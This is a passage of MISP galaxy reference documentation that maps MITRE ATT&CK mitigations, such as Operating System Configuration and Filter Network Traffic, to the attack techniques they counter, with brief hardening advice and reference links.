mitigates: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Portal Capture - T1056.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009" with estimative-language:likelihood-probability="almost-certain"

Table 4215. Table References
Links
https://attack.mitre.org/mitigations/M1026

Multiband Communication Mitigation - T1026

The tag is: misp-galaxy:mitre-course-of-action="Multiband Communication Mitigation - T1026"

View relationships graph

Multiband Communication Mitigation - T1026 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"

Table 4216. Table References
Links
https://attack.mitre.org/mitigations/T1026
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Sudo Caching Mitigation - T1206

Setting the <code>timestamp_timeout</code> to 0 will require the user to input their password every time <code>sudo</code> is executed. Similarly, ensuring that the <code>tty_tickets</code> setting is enabled will prevent this leakage across tty sessions.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Caching Mitigation - T1206"

View relationships graph

Sudo Caching Mitigation - T1206 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206" with estimative-language:likelihood-probability="almost-certain"

Table 4217. Table References
Links
https://attack.mitre.org/mitigations/T1206

Operating System Configuration - M1028

Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

The tag is: misp-galaxy:mitre-course-of-action="Operating System Configuration - M1028"

View relationships graph

Operating System Configuration - M1028 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1139" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 4218. Table References
Links
https://attack.mitre.org/mitigations/M1028

Remote Data Storage - M1029

Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

The tag is: misp-galaxy:mitre-course-of-action="Remote Data Storage - M1029"

View relationships graph

Remote Data Storage - M1029 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 4219. Table References
Links
https://attack.mitre.org/mitigations/M1029

Time Providers Mitigation - T1209

Identify and block potentially malicious software that may be executed as a time provider by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

Consider using Group Policy to configure and block subsequent modifications to W32Time parameters. (Citation: Microsoft W32Time May 2017)

The tag is: misp-galaxy:mitre-course-of-action="Time Providers Mitigation - T1209"

View relationships graph

Time Providers Mitigation - T1209 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"

Table 4220. Table References
Links
https://attack.mitre.org/mitigations/T1209
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

Scheduled Transfer Mitigation - T1029

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Transfer Mitigation - T1029"

View relationships graph

Scheduled Transfer Mitigation - T1029 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

Table 4221. Table References
Links
https://attack.mitre.org/mitigations/T1029
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Limit Software Installation - M1033

Block users or groups from installing unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Limit Software Installation - M1033"

View relationships graph

Limit Software Installation - M1033 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 4222. Table References
Links
https://attack.mitre.org/mitigations/M1033

Credential Access Protection - M1043

Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

The tag is: misp-galaxy:mitre-course-of-action="Credential Access Protection - M1043"

View relationships graph

Credential Access Protection - M1043 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"

Table 4223. Table References
Links
https://attack.mitre.org/mitigations/M1043

Limit Hardware Installation - M1034

Block users or groups from installing or using unapproved hardware on systems, including USB devices.

The tag is: misp-galaxy:mitre-course-of-action="Limit Hardware Installation - M1034"

View relationships graph

Limit Hardware Installation - M1034 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

Table 4224. Table References
Links
https://attack.mitre.org/mitigations/M1034

Path Interception Mitigation - T1034

Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.

Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel).

Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory <code>C:</code> and system directories, such as <code>C:\Windows\</code>, to reduce places where malicious files could be placed for execution.

Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Path Interception Mitigation - T1034"

View relationships graph

Path Interception Mitigation - T1034 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

Table 4225. Table References
Links
https://attack.mitre.org/mitigations/T1034
http://msdn.microsoft.com/en-us/library/ms682425
https://msdn.microsoft.com/en-us/library/ff919712.aspx
https://skanthak.homepage.t-online.de/sentinel.html
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

Service Execution Mitigation - T1035

Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.

Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Service Execution Mitigation - T1035"

View relationships graph

Service Execution Mitigation - T1035 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 4226. Table References
Links
https://attack.mitre.org/mitigations/T1035
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Scheduled Task Mitigation - T1053

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)

Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl</code>. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)

Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)

Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Task Mitigation - T1053"

View relationships graph

Scheduled Task Mitigation - T1053 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 4227. Table References
Links
https://attack.mitre.org/mitigations/T1053
https://github.com/mattifestation/PowerSploit
https://technet.microsoft.com/library/jj852168.aspx
https://technet.microsoft.com/library/dn221960.aspx
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Account Use Policies - M1036

Configure features related to account use like login attempt lockouts, specific login times, etc.

The tag is: misp-galaxy:mitre-course-of-action="Account Use Policies - M1036"

View relationships graph

Account Use Policies - M1036 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"

Table 4228. Table References
Links
https://attack.mitre.org/mitigations/M1036

Filter Network Traffic - M1037

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The tag is: misp-galaxy:mitre-course-of-action="Filter Network Traffic - M1037"

View relationships graph

Filter Network Traffic - M1037 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1522" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012" with estimative-language:likelihood-probability="almost-certain"
